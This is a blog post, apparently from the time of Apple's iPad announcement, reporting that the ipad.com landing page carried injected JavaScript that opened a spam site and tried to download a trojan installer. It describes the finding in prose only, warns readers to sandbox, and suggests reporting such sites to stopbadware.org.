As Apple prepares to amaze the world with their planned announcement today on whatever it is they are officially going to announce, I decided to take a look at the possible names for the device they are going to announce and see if I could get a sneak peek at the domains that might reflect the new product. My surprise is not so much that some names would not resolve, but that one of the domains has links to suspected malware embedded after the html links.
Warning – be very careful clicking links on these sites – use a strong secure browser – you might as well just sandbox this exercise before you click on anything. Everything here is pictures with no links back – but if you reproduce these steps – you do so on your own risk.
Ipad.com is a suggested name for the new device being developed and announced today by Apple – there are going to be a lot of people who want to check out and see if the web sites are up and running for the suggested names, ISlate, IPad, and a few other names that have been suggested for the system. Hackers seem to have injected code after the last /html statement on the IPad.com landing page that opens up the standard Chinese semi-porn junk site – and another site that will attempt to download QVodSetup3.exe on your computer.
Here is the IPad.com landing page – it looks like a super secret page and exactly what you would expect to see for a soon to launch product.
That is until you open up the source of the page (looking for developer comments).
At the end of the last HTML tag you see an interesting java script as shown in the picture. Using Notepad – I opened up the two links to see what was there.
Ladown is a common spammy Chinese site with no major issues, but IL21 caught my attention because they try to load QVodSetup3.exe when the page is loaded as shown below.
Looking the file up in Google showed that it has association with a number of bad things it does, and that it is easily stopped by many of the Anti Virus programs out on the market today. Not sophisticated but knowing how many people do not update their AV or surf the net without an AV package – this would be an effective program to do simple Trojan work.
The interesting part is the WHOIS for the IPad domain – it is a registrar who is in trouble with internic – and has very generic data as to who the actual owner is.
With all the hype about Apple’s new product launch – and if this is the actual domain – Apple will wipe this out in a bit leaving this as a hackers historical footnote which is why I captured all this in pictures. But if you are launching a highly visible product with mountain loads of hype to go along with that, hackers are not going to be far behind. It would be a good idea to check all the possible domains, grab which ones you can, and if there is malware on any of them, report those web sites to stopbadware.org.
(Cross-posted @ IT Toolbox)